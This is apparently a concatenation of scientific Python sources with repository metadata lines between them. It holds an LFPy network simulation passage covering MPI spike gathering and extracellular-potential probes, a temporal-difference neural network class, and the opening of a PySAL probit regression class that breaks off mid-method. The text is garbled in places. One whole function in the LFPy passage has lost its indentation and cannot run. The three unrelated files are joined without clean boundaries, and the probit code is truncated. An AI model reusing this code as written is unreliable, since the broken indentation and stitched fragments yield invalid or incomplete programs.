        # Collect spike trains across all RANKs to RANK 0
        for name in self.population_names:
            population = self.populations[name]
            for i in range(len(population.spike_vectors)):
                population.spike_vectors[i] = \
                    np.array(population.spike_vectors[i])
        # RANK 0 gathers spikes/gids per population via point-to-point
        # messages (tags 13/14); all other RANKs send and return None
        if RANK == 0:
            times = []
            gids = []
            for i, name in enumerate(self.population_names):
                times.append([])
                gids.append([])
                times[i] += [x for x in self.populations[name].spike_vectors]
                gids[i] += [x for x in self.populations[name].gids]
                for j in range(1, SIZE):
                    times[i] += COMM.recv(source=j, tag=13)
                    gids[i] += COMM.recv(source=j, tag=14)
        else:
            times = None
            gids = None
            for name in self.population_names:
                COMM.send([x for x in self.populations[name].spike_vectors],
                          dest=0, tag=13)
                COMM.send([x for x in self.populations[name].gids],
                          dest=0, tag=14)
        # create final output file, summing up single RANK output from
        # temporary files
        # (every RANK must take part in the collective Reduce calls below;
        # only RANK 0 opens and writes the merged file)
        if to_file and probes is not None:
            op = MPI.SUM
            fname = os.path.join(self.OUTPUTPATH,
                                 'tmp_output_RANK_{:03d}.h5'.format(RANK))
            f0 = h5py.File(fname, 'r')
            if RANK == 0:
                f1 = h5py.File(os.path.join(self.OUTPUTPATH, file_name), 'w')
            dtype = []
            for key, value in f0[list(f0.keys())[0]].items():
                dtype.append((str(key), float))
            for grp in f0.keys():
                if RANK == 0:
                    # get shape from the first dataset
                    # (they should all be equal):
                    for value in f0[grp].values():
                        shape = value.shape
                        continue
                    f1[grp] = np.zeros(shape, dtype=dtype)
                for key, value in f0[grp].items():
                    if RANK == 0:
                        recvbuf = np.zeros(shape, dtype=float)
                    else:
                        recvbuf = None
                    COMM.Reduce(value[()].astype(float), recvbuf,
                                op=op, root=0)
                    if RANK == 0:
                        f1[grp][key] = recvbuf
            f0.close()
            if RANK == 0:
                f1.close()
            # each RANK removes its own temporary file
            os.remove(fname)
        if probes is not None:
            if to_memory:
                # communicate and sum up measurements on each probe before
                # returing spike times and corresponding gids:
                for probe in probes:
                    probe.data = ReduceStructArray(probe.data)
        return dict(times=times, gids=gids)
def __create_network_dummycell(self):
"""
set up parameters for a DummyCell object, allowing for computing
the sum of all single-cell LFPs at each timestep, essentially
creating one supercell with all segments of all cell objects
present on this RANK.
"""
# compute the total number of segments per population on this RANK
nsegs = [[cell.totnsegs for cell in self.populations[name].cells]
for name in self.population_names]
for i, nseg in enumerate(nsegs):
if nseg == []:
nsegs[i] = [0]
for i, y in enumerate(nsegs):
nsegs[i] = np.sum(y)
nsegs = np.array(nsegs, dtype=int)
totnsegs = nsegs.sum()
x = np.empty((0, 2))
y = np.empty((0, 2))
z = np.empty((0, 2))
d = np.array([])
area = np.array([])
length = np.array([])
somainds = np.array([], dtype=int)
nseg = 0
for name in self.population_names:
for cell in self.populations[name].cells:
x = np.r_[x, cell.x]
y = np.r_[y, cell.y]
z = np.r_[z, cell.z]
d = np.r_[d, cell.d]
area = np.r_[area, cell.area]
length = np.r_[length, cell.length]
somainds = np.r_[somainds, cell.get_idx("soma") + nseg]
nseg += cell.totnsegs
# return number of segments per population and DummyCell object
return nsegs, DummyCell(totnsegs, x, y, z, d, area, length, somainds)
    def __run_simulation(self, cvode, variable_dt=False, atol=0.001):
        """
        Running the actual simulation in NEURON, simulations in NEURON
        are now interruptable.
        Parameters
        ----------
        cvode: neuron.h.CVode() object
        variable_dt: bool
            switch for variable-timestep method
        atol: float
            absolute tolerance with CVode for variable time-step method
        """
        # set maximum integration step, it is necessary for communication of
        # spikes across RANKs to occur.
        self.pc.set_maxstep(10)
        # time resolution
        neuron.h.dt = self.dt
        # needed for variable dt method
        if variable_dt:
            cvode.active(1)
            cvode.atol(atol)
        else:
            cvode.active(0)
        # initialize state
        neuron.h.finitialize(self.v_init * units.mV)
        # initialize current- and record
        if cvode.active():
            cvode.re_init()
        else:
            neuron.h.fcurrent()
        neuron.h.frecord_init()
        # Starting simulation at tstart
        neuron.h.t = self.tstart
        # pre-load queued synaptic activation times onto each cell;
        # only needed if LFPy.Synapse classes are used.
        for name in self.population_names:
            for cell in self.populations[name].cells:
                cell._load_spikes()
        # advance simulation until tstop
        neuron.h.continuerun(self.tstop * units.ms)
    def __run_simulation_with_probes(self, cvode,
                                     probes=None,
                                     variable_dt=False,
                                     atol=0.001,
                                     rtol=0.,
                                     to_memory=True,
                                     to_file=False,
                                     file_name=None,
                                     use_ipas=False, use_icap=False,
                                     use_isyn=False,
                                     rec_pop_contributions=False
                                     ):
        """
        Running the actual simulation in NEURON with list of probes.
        Each object in `probes` must have a public method
        `get_transformation_matrix` which returns a linear mapping of
        transmembrane currents to corresponding measurement.
        Parameters
        ----------
        cvode: neuron.h.CVode() object
        probes: list of :obj:, optional
            None or list of LFPykit.RecExtElectrode like object instances that
            each have a public method `get_transformation_matrix` returning
            a matrix that linearly maps each compartments' transmembrane
            current to corresponding measurement as
            .. math:: \\mathbf{P} = \\mathbf{M} \\mathbf{I}
        variable_dt: bool
            switch for variable-timestep method
        atol: float
            absolute tolerance with CVode for variable time-step method
        rtol: float
            relative tolerance with CVode for variable time-step method
        to_memory: bool
            Boolean flag for computing extracellular potentials,
            default is True.
            If True, the corresponding <probe>.data attribute will be set.
        to_file: bool or None
            Boolean flag for computing extracellular potentials to file
            <OUTPUTPATH/file_name>, default is False. Raises an Exception if
            `to_memory` is True.
        file_name: formattable str
            If to_file is True, file which extracellular potentials will be
            written to. The file format is HDF5, default is
            "output_RANK_{:03d}.h5". The output is written per RANK, and the
            RANK # will be inserted into the corresponding file name.
        use_ipas: bool
            if True, compute the contribution to extracellular potentials
            across the passive leak channels embedded in the cells membranes
            summed over populations
        use_icap: bool
            if True, compute the contribution to extracellular potentials
            across the membrane capacitance embedded in the cells membranes
            summed over populations
        use_isyn: bool
            if True, compute the contribution to extracellular potentials
            across the excitatory and inhibitory synapses embedded in the cells
            membranes summed over populations
        rec_pop_contributions: bool
            if True, compute and return single-population contributions to the
            extracellular potential during each time step of the simulation
        Returns
        -------
        Raises
        ------
        Exception:
            - `if to_memory == to_file == True`
            - `if to_file == True and file_name is None`
            - `if to_file == variable_dt == True`
            - `if <probe>.cell is not None`
        """
        # NOTE(review): the `rtol` argument is documented but never applied
        # below (only cvode.atol(atol) is set) -- confirm intent.
        if to_memory and to_file:
            raise Exception('to_memory and to_file can not both be True')
        # to_file requires an explicit file name
        # NOTE(review): bare Exception raised without a message here
        if to_file and file_name is None:
            raise Exception
        # create a dummycell object lumping together needed attributes
        # for calculation of extracellular potentials etc. The population_nsegs
        # array is used to slice indices such that single-population
        # contributions to the potential can be calculated.
        population_nsegs, network_dummycell = self.__create_network_dummycell()
        # set cell attribute on each probe, assuming that each probe was
        # instantiated with argument cell=None
        for probe in probes:
            if probe.cell is None:
                probe.cell = network_dummycell
            else:
                raise Exception('{}.cell!=None'.format(probe.__class__))
        # create list of transformation matrices; one for each probe
        transforms = []
        if probes is not None:
            for probe in probes:
                transforms.append(probe.get_transformation_matrix())
        # reset probe.cell to None, as it is no longer needed
        for probe in probes:
            probe.cell = None
        # set maximum integration step, it is necessary for communication of
        # spikes across RANKs to occur.
        # NOTE: Should this depend on the minimum delay in the network?
        self.pc.set_maxstep(10)
        # Initialize NEURON simulations of cell object
        neuron.h.dt = self.dt
        # needed for variable dt method
        if variable_dt:
            cvode.active(1)
            cvode.atol(atol)
        else:
            cvode.active(0)
        # initialize state
        neuron.h.finitialize(self.v_init * units.mV)
        # use fast calculation of transmembrane currents
        cvode.use_fast_imem(1)
        # initialize current- and record
        if cvode.active():
            cvode.re_init()
        else:
            neuron.h.fcurrent()
        neuron.h.frecord_init()
        # Starting simulation at tstart
        neuron.h.t = self.tstart
        # create list of cells across all populations to simplify loops
        cells = []
        for name in self.population_names:
            cells += self.populations[name].cells
        # load spike times from NetCon, only needed if LFPy.Synapse class
        # is used
        for cell in cells:
            cell._load_spikes()
        # define data type for structured arrays dependent on the boolean
        # arguments
        dtype = [('imem', float)]
        if use_ipas:
            dtype += [('ipas', float)]
        if use_icap:
            dtype += [('icap', float)]
        if use_isyn:
            dtype += [('isyn_e', float), ('isyn_i', float)]
        if rec_pop_contributions:
            dtype += list(zip(self.population_names,
                              [float] * len(self.population_names)))
        # setup list of structured arrays for all extracellular potentials
        # at each contact from different source terms and subpopulations
        if to_memory:
            for probe, M in zip(probes, transforms):
                probe.data = np.zeros((M.shape[0],
                                       int(self.tstop / self.dt) + 1),
                                      dtype=dtype)
        # signals for each probe will be stored here during simulations
        if to_file:
            # ensure right ending:
            if file_name.split('.')[-1] != 'h5':
                file_name += '.h5'
            outputfile = h5py.File(os.path.join(self.OUTPUTPATH,
                                                file_name.format(RANK)), 'w')
            # define unique group names for each probe
            names = []
            for probe, M in zip(probes, transforms):
                name = probe.__class__.__name__
                i = 0
                # append the first unused suffix i, giving group names such
                # as "RecExtElectrode0", "RecExtElectrode1", ...
                while True:
                    if name + '{}'.format(i) not in names:
                        names.append(name + '{}'.format(i))
                        break
                    i += 1
            # create groups
            for i, (name, probe, M) in enumerate(zip(names, probes,
                                                     transforms)):
                # can't do it this way until h5py issue #740
                # (https://github.com/h5py/h5py/issues/740) is fixed:
                # outputfile['{}'.format(name)] = np.zeros((M.shape[0],
                #     int(network.tstop / network.dt) + 1), dtype=dtype)
                probe.data = outputfile.create_group('{}'.format(name))
                for key, val in dtype:
                    probe.data[key] = np.zeros((M.shape[0],
                                                int(self.tstop / self.dt)
                                                + 1),
                                               dtype=val)
        # temporary vector to store membrane currents at each timestep:
        imem = np.zeros(network_dummycell.totnsegs, dtype=dtype)
        def get_imem(imem):
            '''helper function to gather currents across all cells
            on this RANK'''
            i = 0
            totnsegs = 0
            if use_isyn:
                imem['isyn_e'] = 0.  # must reset these for every iteration
                imem['isyn_i'] = 0.  # because we sum over synapses
            for cell in cells:
                for sec in cell.allseclist:
                    for seg in sec:
                        imem['imem'][i] = seg.i_membrane_
                        if use_ipas:
                            imem['ipas'][i] = seg.i_pas
                        if use_icap:
                            imem['icap'][i] = seg.i_cap
                        i += 1
                if use_isyn:
                    # synapses with reversal potential above -50 mV are
                    # counted as excitatory, the rest as inhibitory
                    for idx, syn in zip(cell.synidx, cell.netconsynapses):
                        if hasattr(syn, 'e') and syn.e > -50:
                            imem['isyn_e'][idx + totnsegs] += syn.i
                        else:
                            imem['isyn_i'][idx + totnsegs] += syn.i
                totnsegs += cell.totnsegs
            return imem
        # run fadvance until time limit, and calculate LFPs for each timestep
        tstep = 0
        while neuron.h.t < self.tstop:
            if neuron.h.t >= 0:
                imem = get_imem(imem)
                for j, (probe, M) in enumerate(zip(probes, transforms)):
                    probe.data['imem'][:, tstep] = M @ imem['imem']
                    if use_ipas:
                        # NOTE(review): the factor 1E-2 presumably converts
                        # current density times membrane area to nA -- confirm
                        probe.data['ipas'][:, tstep] = \
                            M @ (imem['ipas'] * network_dummycell.area * 1E-2)
                    if use_icap:
                        probe.data['icap'][:, tstep] = \
                            M @ (imem['icap'] * network_dummycell.area * 1E-2)
                    if use_isyn:
                        probe.data['isyn_e'][:, tstep] = M @ imem['isyn_e']
                        probe.data['isyn_i'][:, tstep] = M @ imem['isyn_i']
                if rec_pop_contributions:
                    for j, (probe, M) in enumerate(zip(probes, transforms)):
                        k = 0  # counter
                        for nsegs, pop_name in zip(population_nsegs,
                                                   self.population_names):
                            cellinds = np.arange(k, k + nsegs)
                            probe.data[pop_name][:, tstep] = \
                                M[:, cellinds] @ imem['imem'][cellinds, ]
                            k += nsegs
                tstep += 1
            neuron.h.fadvance()
            if neuron.h.t % 100. == 0.:
                if RANK == 0:
                    print('t = {} ms'.format(neuron.h.t))
        try:
            # calculate LFP after final fadvance(), skipped if IndexError is
            # encountered
            imem = get_imem(imem)
            for j, (probe, M) in enumerate(zip(probes, transforms)):
                probe.data['imem'][:, tstep] = M @ imem['imem']
                if use_ipas:
                    probe.data['ipas'][:, tstep] = \
                        M @ (imem['ipas'] * network_dummycell.area * 1E-2)
                if use_icap:
                    probe.data['icap'][:, tstep] = \
                        M @ (imem['icap'] * network_dummycell.area * 1E-2)
                if use_isyn:
                    probe.data['isyn_e'][:, tstep] = M @ imem['isyn_e']
                    probe.data['isyn_i'][:, tstep] = M @ imem['isyn_i']
            if rec_pop_contributions:
                for j, (probe, M) in enumerate(zip(probes, transforms)):
                    k = 0  # counter
                    for nsegs, pop_name in zip(population_nsegs,
                                               self.population_names):
                        cellinds = np.arange(k, k + nsegs)
                        probe.data[pop_name][:, tstep] = \
                            M[:, cellinds] @ imem['imem'][cellinds, ]
                        k += nsegs
        except IndexError:
            pass
        if to_file:
            outputfile.close()
def ReduceStructArray(sendbuf, op=MPI.SUM):
    """
    simplify MPI Reduce for structured ndarrays with floating point numbers
    Parameters
    ----------
    sendbuf: structured ndarray
        Array data to be reduced (default: summed)
    op: mpi4py.MPI.Op object
        MPI_Reduce function. Default is mpi4py.MPI.SUM
    Returns
    -------
    recvbuf: structured ndarray or None
        Reduced array on RANK 0, None on all other RANKs
    """
    # root broadcasts the array layout so every RANK loops over the same
    # fields in the same order
    if RANK == 0:
        shape, field_names = sendbuf.shape, sendbuf.dtype.names
    else:
        shape, field_names = None, None
    shape = COMM.bcast(shape)
    field_names = COMM.bcast(field_names)
    # only the root allocates the reduced output array (float64 per field)
    if RANK == 0:
        out_dtype = [(field, 'f8') for field in field_names]
        reduced = np.zeros(shape, dtype=out_dtype)
    else:
        reduced = None
    # reduce one field at a time; only the root receives the result
    for field in field_names:
        target = np.zeros(shape) if RANK == 0 else None
        COMM.Reduce(np.array(sendbuf[field]), target, op=op, root=0)
        if RANK == 0:
            reduced[field] = target
    return reduced
| espenhgn/LFPy | LFPy/network.py | Python | gpl-3.0 | 66,722 | [
"NEURON"
] | 251efcb3f8b938cce3430c9c326bca016f337ccd897964a62e43d0c3ad39cb78 |
import sys
import json
import random
import numpy as np
def sigmoid(z):
    """
    Logistic sigmoid evaluated element-wise at the given input.
    :param z: Vector or scalar input.
    :return: 1 / (1 + exp(-z)) for the given input.
    """
    denominator = 1.0 + np.exp(-z)
    return 1.0 / denominator
def sigmoid_prime(z):
    """
    Derivative of the sigmoid evaluated at the given input.

    Computed as s * (1 - s) with s = sigmoid(z), which is algebraically
    identical to the former exp(-z) * sigmoid(z)**2 but numerically robust:
    the old form evaluated inf * 0 = nan once exp(-z) overflowed for large
    negative z, whereas this form correctly underflows to 0.
    :param z: Input vector or scalar.
    :return: Element-wise derivative of the sigmoid at ``z``.
    """
    # inline sigmoid so this function is self-contained
    s = 1.0 / (1.0 + np.exp(-z))
    return s * (1.0 - s)
class CrossEntropyCost(object):
    """Cross-entropy cost for a sigmoid output layer."""
    @staticmethod
    def fn(a, y):
        """Return the cross-entropy cost between activations ``a`` and
        targets ``y`` (nan values from 0*log(0) terms are zeroed out)."""
        per_unit = -y * np.log(a) - (1.0 - y) * np.log(1.0 - a)
        return np.sum(np.nan_to_num(per_unit))
    @staticmethod
    def delta(z, a, y):
        """Output-layer error; the sigmoid-prime factor cancels for this
        cost, so ``z`` is unused."""
        return a - y
class QuadraticCost(object):
    """Quadratic (mean-squared-error style) cost."""
    @staticmethod
    def fn(a, y):
        """Return half the squared Euclidean distance between ``a`` and
        ``y``."""
        residual = a - y
        return 0.5 * np.linalg.norm(residual) ** 2
    @staticmethod
    def delta(z, a, y):
        """Output-layer error, scaled by the sigmoid derivative at ``z``."""
        return (a - y) * sigmoid_prime(z)
class TDNN(object):
    """
    Simple feed-forward network with temporal-difference style updates.
    Network layout and training code follow the example here:
    http://neuralnetworksanddeeplearning.com/
    """
    def __init__(self, nodes_per_layer, cost=None):
        """
        Build the network and randomly initialize weights and biases.
        :param nodes_per_layer: List with the number of nodes per layer,
            e.g. [input_size, hidden_size, output_size].
        :param cost: Cost class exposing static ``fn`` and ``delta`` methods
            (e.g. CrossEntropyCost or QuadraticCost). Defaults to
            CrossEntropyCost; existing callers that omit it keep working.
        """
        self.num_layers = len(nodes_per_layer)
        self.nodes_per_layer = nodes_per_layer
        # BUGFIX: backprop() referenced self.cost, but it was never assigned
        self.cost = cost if cost is not None else CrossEntropyCost
        self.biases = None
        self.weights = None
        self.default_weight_initializer()
        # accumulators for the TD eligibility traces, reset by start_game()
        self.total_grad_b = None
        self.total_grad_w = None
        self.last_result = None
        self.total_delta_b = None
        self.total_delta_w = None
    def default_weight_initializer(self):
        """
        Initialize biases N(0, 1) and weights N(0, 1/fan_in).
        """
        self.biases = [np.random.randn(y, 1) for y in self.nodes_per_layer[1:]]
        # Normalized Gaussian distributed weights
        self.weights = [np.random.randn(y, x) / np.sqrt(x)
                        for x, y in zip(self.nodes_per_layer[:-1], self.nodes_per_layer[1:])]
    def large_weight_initializer(self):
        """
        Initialize biases and weights from a standard normal distribution
        (no fan-in scaling).
        """
        # BUGFIX: previously read self.sizes, which does not exist on this
        # class; the attribute is named nodes_per_layer (see __init__)
        self.biases = [np.random.randn(y, 1) for y in self.nodes_per_layer[1:]]
        self.weights = [np.random.randn(y, x)
                        for x, y in zip(self.nodes_per_layer[:-1],
                                        self.nodes_per_layer[1:])]
    def predict(self, a):
        """
        Predict outputs for the given input.
        :param a: An input column vector.
        :return: A vector of outputs.
        """
        for b, w in zip(self.biases, self.weights):
            a = sigmoid(np.dot(w, a) + b)
        return a
    def start_game(self):
        """
        Reset all per-game TD accumulators before a new game/episode.
        """
        self.total_grad_w = None
        self.total_grad_b = None
        self.last_result = None
        self.total_delta_w = None
        self.total_delta_b = None
    def partial_update(self, x, y, eta, lmbda):
        """
        Accumulate a TD(lambda)-style update for one move of a game.
        :param x: Input vector for the current position.
        :param y: Network evaluation of the current position.
        :param eta: Learning rate.
        :param lmbda: Trace-decay parameter (lambda).
        """
        y_next = y
        y_last = self.last_result
        grad_b, grad_w = self.backprop(x, y)
        if y_last is None:
            # first move of the game: seed the traces and zero the deltas
            self.total_grad_b = grad_b
            self.total_grad_w = grad_w
            self.total_delta_b = [np.zeros(b.shape) for b in grad_b]
            self.total_delta_w = [np.zeros(w.shape) for w in grad_w]
        else:
            # BUGFIX: the previous code applied `+=` and `*` directly to
            # Python lists of arrays, which is not element-wise arithmetic;
            # use per-layer comprehensions instead.
            # NOTE(review): assumes a scalar (1x1) network output so the TD
            # error broadcasts over each layer -- confirm for multi-output.
            td_err = y_next - y_last
            self.total_delta_w = [tdw - eta * td_err * tgw
                                  for tdw, tgw in zip(self.total_delta_w,
                                                      self.total_grad_w)]
            self.total_delta_b = [tdb - eta * td_err * tgb
                                  for tdb, tgb in zip(self.total_delta_b,
                                                      self.total_grad_b)]
            # decay the eligibility traces and add the fresh gradients
            self.total_grad_w = [gw + lmbda * tgw
                                 for gw, tgw in zip(grad_w, self.total_grad_w)]
            self.total_grad_b = [gb + lmbda * tgb
                                 for gb, tgb in zip(grad_b, self.total_grad_b)]
        self.last_result = y
    def update_mini_batch(self, x, y, eta, lmbda, n):
        """
        One SGD step on a single (x, y) example with L2 weight decay.
        :param x: Input vector.
        :param y: Target output vector.
        :param eta: Learning rate.
        :param lmbda: L2 regularization strength.
        :param n: Total training-set size (for the weight decay term).
        """
        nabla_b, nabla_w = self.backprop(x, y)
        self.weights = [(1 - eta * (lmbda / n)) * w - eta * nw
                        for w, nw in zip(self.weights, nabla_w)]
        # BUGFIX: previously divided by len(mini_batch), an undefined name;
        # this method processes a single example, so the plain learning rate
        # applies (matching the weight update above)
        self.biases = [b - eta * nb
                       for b, nb in zip(self.biases, nabla_b)]
    def backprop(self, x, y):
        """Return a tuple ``(nabla_b, nabla_w)`` representing the
        gradient for the cost function C_x. ``nabla_b`` and
        ``nabla_w`` are layer-by-layer lists of numpy arrays, similar
        to ``self.biases`` and ``self.weights``."""
        nabla_b = [np.zeros(b.shape) for b in self.biases]
        nabla_w = [np.zeros(w.shape) for w in self.weights]
        # feedforward
        activation = x
        activations = [x]  # list to store all the activations, layer by layer
        zs = []  # list to store all the z vectors, layer by layer
        for b, w in zip(self.biases, self.weights):
            z = np.dot(w, activation) + b
            zs.append(z)
            activation = sigmoid(z)
            activations.append(activation)
        # backward pass
        delta = self.cost.delta(zs[-1], activations[-1], y)
        nabla_b[-1] = delta
        nabla_w[-1] = np.dot(delta, activations[-2].transpose())
        # Note that the variable l in the loop below is used a little
        # differently to the notation in Chapter 2 of the book. Here,
        # l = 1 means the last layer of neurons, l = 2 is the
        # second-last layer, and so on. It's a renumbering of the
        # scheme in the book, used here to take advantage of the fact
        # that Python can use negative indices in lists.
        # BUGFIX: xrange -> range for Python 3 compatibility
        for l in range(2, self.num_layers):
            z = zs[-l]
            sp = sigmoid_prime(z)
            delta = np.dot(self.weights[-l + 1].transpose(), delta) * sp
            nabla_b[-l] = delta
            nabla_w[-l] = np.dot(delta, activations[-l - 1].transpose())
        return nabla_b, nabla_w
    def save(self, filename):
        """
        Serialize the network layout, weights and biases to a JSON file.
        :param filename: Path of the file to write.
        """
        data = {
            # BUGFIX: was self.sizes (undefined); the JSON key stays "sizes"
            # so load() keeps working on previously saved files
            "sizes": self.nodes_per_layer,
            "weights": [w.tolist() for w in self.weights],
            "biases": [b.tolist() for b in self.biases]
        }
        with open(filename, 'w') as f:
            json.dump(data, f)
def load(filename):
    """
    Reconstruct a TDNN instance from a JSON file written by ``TDNN.save``.
    :param filename: Path of the JSON file to read.
    :return: A ``TDNN`` with the stored layout, weights and biases.
    """
    with open(filename, 'r') as fp:
        payload = json.load(fp)
    network = TDNN(payload["sizes"])
    network.weights = [np.array(w) for w in payload['weights']]
    network.biases = [np.array(b) for b in payload['biases']]
    return network
"Gaussian"
] | 1ae0dbf119c1890f5cc19ea0a1802873f824159f84555ae491d2aea1cbea607c |
"""Probit regression class and diagnostics."""
__author__ = "Luc Anselin luc.anselin@asu.edu, Pedro V. Amaral pedro.amaral@asu.edu"
import numpy as np
import numpy.linalg as la
import scipy.optimize as op
from scipy.stats import norm, chisqprob
import scipy.sparse as SP
import user_output as USER
import summary_output as SUMMARY
__all__ = ["Probit"]
class BaseProbit:
    """
    Probit class to do all the computations
    Parameters
    ----------
    x : array
        nxk array of independent variables (assumed to be aligned with y)
    y : array
        nx1 array of dependent binary variable
    w : W
        PySAL weights instance aligned with y
    optim : string
        Optimization method.
        Default: 'newton' (Newton-Raphson).
        Alternatives: 'ncg' (Newton-CG), 'bfgs' (BFGS algorithm)
    scalem : string
        Method to calculate the scale of the marginal effects.
        Default: 'phimean' (Mean of individual marginal effects)
        Alternative: 'xmean' (Marginal effects at variables mean)
    maxiter : int
        Maximum number of iterations until optimizer stops
    Attributes
    ----------
    x : array
        Two dimensional array with n rows and one column for each
        independent (exogenous) variable, including the constant
    y : array
        nx1 array of dependent variable
    betas : array
        kx1 array with estimated coefficients
    predy : array
        nx1 array of predicted y values
    n : int
        Number of observations
    k : int
        Number of variables
    vm : array
        Variance-covariance matrix (kxk)
    z_stat : list of tuples
        z statistic; each tuple contains the pair (statistic,
        p-value), where each is a float
    xmean : array
        Mean of the independent variables (kx1)
    predpc : float
        Percent of y correctly predicted
    logl : float
        Log-Likelihhod of the estimation
    scalem : string
        Method to calculate the scale of the marginal effects.
    scale : float
        Scale of the marginal effects.
    slopes : array
        Marginal effects of the independent variables (k-1x1)
        Note: Disregards the presence of dummies.
    slopes_vm : array
        Variance-covariance matrix of the slopes (k-1xk-1)
    LR : tuple
        Likelihood Ratio test of all coefficients = 0
        (test statistics, p-value)
    Pinkse_error: float
        Lagrange Multiplier test against spatial error correlation.
        Implemented as presented in Pinkse (2004)
    KP_error : float
        Moran's I type test against spatial error correlation.
        Implemented as presented in Kelejian and Prucha (2001)
    PS_error : float
        Lagrange Multiplier test against spatial error correlation.
        Implemented as presented in Pinkse and Slade (1998)
    warning : boolean
        if True Maximum number of iterations exceeded or gradient
        and/or function calls not changing.
    References
    ----------
    .. [1] Pinkse, J. (2004). Moran-flavored tests with nuisance parameter. In: Anselin,
    L., Florax, R. J., Rey, S. J. (editors) Advances in Spatial Econometrics,
    pages 67-77. Springer-Verlag, Heidelberg.
    .. [2] Kelejian, H., Prucha, I. (2001) "On the asymptotic distribution of the
    Moran I test statistic with applications". Journal of Econometrics, 104(2):219-57.
    .. [3] Pinkse, J., Slade, M. E. (1998) "Contracting in space: an application of
    spatial statistics to discrete-choice models". Journal of Econometrics, 85(1):125-54.
    Examples
    --------
    >>> import numpy as np
    >>> import pysal
    >>> dbf = pysal.open(pysal.examples.get_path('columbus.dbf'),'r')
    >>> y = np.array([dbf.by_col('CRIME')]).T
    >>> x = np.array([dbf.by_col('INC'), dbf.by_col('HOVAL')]).T
    >>> x = np.hstack((np.ones(y.shape),x))
    >>> w = pysal.open(pysal.examples.get_path("columbus.gal"), 'r').read()
    >>> w.transform='r'
    >>> model = BaseProbit((y>40).astype(float), x, w=w)
    >>> np.around(model.betas, decimals=6)
    array([[ 3.353811],
           [-0.199653],
           [-0.029514]])
    >>> np.around(model.vm, decimals=6)
    array([[ 0.852814, -0.043627, -0.008052],
           [-0.043627,  0.004114, -0.000193],
           [-0.008052, -0.000193,  0.00031 ]])
    >>> tests = np.array([['Pinkse_error','KP_error','PS_error']])
    >>> stats = np.array([[model.Pinkse_error[0],model.KP_error[0],model.PS_error[0]]])
    >>> pvalue = np.array([[model.Pinkse_error[1],model.KP_error[1],model.PS_error[1]]])
    >>> print np.hstack((tests.T,np.around(np.hstack((stats.T,pvalue.T)),6)))
    [['Pinkse_error' '3.131719' '0.076783']
     ['KP_error' '1.721312' '0.085194']
     ['PS_error' '2.558166' '0.109726']]
    """
    def __init__(self, y, x, w=None, optim='newton', scalem='phimean', maxiter=100):
        self.y = y
        self.x = x
        self.n, self.k = x.shape
        self.optim = optim
        self.scalem = scalem
        self.w = w
        self.maxiter = maxiter
        # maximum-likelihood estimation; par_est() returns the optimizer
        # result tuple and a flag signalling convergence problems
        par_est, self.warning = self.par_est()
        self.betas = np.reshape(par_est[0], (self.k, 1))
        self.logl = -float(par_est[1])
        # lazily-computed diagnostics below are memoized in this dict
        self._cache = {}
    # variance-covariance matrix: negative inverse Hessian at the estimate
    @property
    def vm(self):
        if 'vm' not in self._cache:
            H = self.hessian(self.betas)
            self._cache['vm'] = -la.inv(H)
        return self._cache['vm']
    # z statistics and two-sided p-values for each coefficient
    @property
    def z_stat(self):
        if 'z_stat' not in self._cache:
            variance = self.vm.diagonal()
            zStat = self.betas.reshape(len(self.betas),) / np.sqrt(variance)
            rs = {}
            for i in range(len(self.betas)):
                rs[i] = (zStat[i], norm.sf(abs(zStat[i])) * 2)
            self._cache['z_stat'] = rs.values()
        return self._cache['z_stat']
    @property
    def slopes_std_err(self):
        if 'slopes_std_err' not in self._cache:
            variance = self.slopes_vm.diagonal()
            self._cache['slopes_std_err'] = np.sqrt(variance)
        return self._cache['slopes_std_err']
    @property
    def slopes_z_stat(self):
        if 'slopes_z_stat' not in self._cache:
            zStat = self.slopes.reshape(
                len(self.slopes),) / self.slopes_std_err
            rs = {}
            for i in range(len(self.slopes)):
                rs[i] = (zStat[i], norm.sf(abs(zStat[i])) * 2)
            self._cache['slopes_z_stat'] = rs.values()
        return self._cache['slopes_z_stat']
    # column means of the independent variables as a kx1 vector
    @property
    def xmean(self):
        if 'xmean' not in self._cache:
            self._cache['xmean'] = np.reshape(
                sum(self.x) / self.n, (self.k, 1))
        return self._cache['xmean']
    # linear predictor x*beta
    @property
    def xb(self):
        if 'xb' not in self._cache:
            self._cache['xb'] = np.dot(self.x, self.betas)
        return self._cache['xb']
    # predicted probabilities Phi(x*beta)
    @property
    def predy(self):
        if 'predy' not in self._cache:
            self._cache['predy'] = norm.cdf(self.xb)
        return self._cache['predy']
    # percent correctly predicted using a 0.5 probability cutoff
    @property
    def predpc(self):
        if 'predpc' not in self._cache:
            predpc = abs(self.y - self.predy)
            for i in range(len(predpc)):
                if predpc[i] > 0.5:
                    predpc[i] = 0
                else:
                    predpc[i] = 1
            self._cache['predpc'] = float(100 * np.sum(predpc) / self.n)
        return self._cache['predpc']
    # normal density phi(x*beta), used for the marginal-effect scale
    @property
    def phiy(self):
        if 'phiy' not in self._cache:
            self._cache['phiy'] = norm.pdf(self.xb)
        return self._cache['phiy']
    @property
    def scale(self):
        if 'scale' not in self._cache:
            if self.scalem == 'phimean':
                self._cache['scale'] = float(1.0 * np.sum(self.phiy) / self.n)
            if self.scalem == 'xmean':
                self._cache['scale'] = float(
                    norm.pdf(np.dot(self.xmean.T, self.betas)))
        return self._cache['scale']
    @property
    def slopes(self):
        if 'slopes' not in self._cache:
            # Disregard the presence of dummies.
            self._cache['slopes'] = self.betas[1:] * self.scale
        return self._cache['slopes']
    # delta-method variance of the marginal effects (constant dropped)
    @property
    def slopes_vm(self):
        if 'slopes_vm' not in self._cache:
            x = self.xmean
            b = self.betas
            dfdb = np.eye(self.k) - np.dot(b.T, x) * np.dot(b, x.T)
            slopes_vm = (self.scale ** 2) * \
                np.dot(np.dot(dfdb, self.vm), dfdb.T)
            self._cache['slopes_vm'] = slopes_vm[1:, 1:]
        return self._cache['slopes_vm']
    # likelihood-ratio test against the intercept-only model
    @property
    def LR(self):
        if 'LR' not in self._cache:
            P = 1.0 * np.sum(self.y) / self.n
            LR = float(
                -2 * (self.n * (P * np.log(P) + (1 - P) * np.log(1 - P)) - self.logl))
            self._cache['LR'] = (LR, chisqprob(LR, self.k))
        return self._cache['LR']
    # naive residuals y - Phi(x*beta)
    @property
    def u_naive(self):
        if 'u_naive' not in self._cache:
            u_naive = self.y - self.predy
            self._cache['u_naive'] = u_naive
        return self._cache['u_naive']
    # generalized residuals (naive residuals rescaled by phi/(Phi*(1-Phi)))
    @property
    def u_gen(self):
        if 'u_gen' not in self._cache:
            Phi_prod = self.predy * (1 - self.predy)
            u_gen = self.phiy * (self.u_naive / Phi_prod)
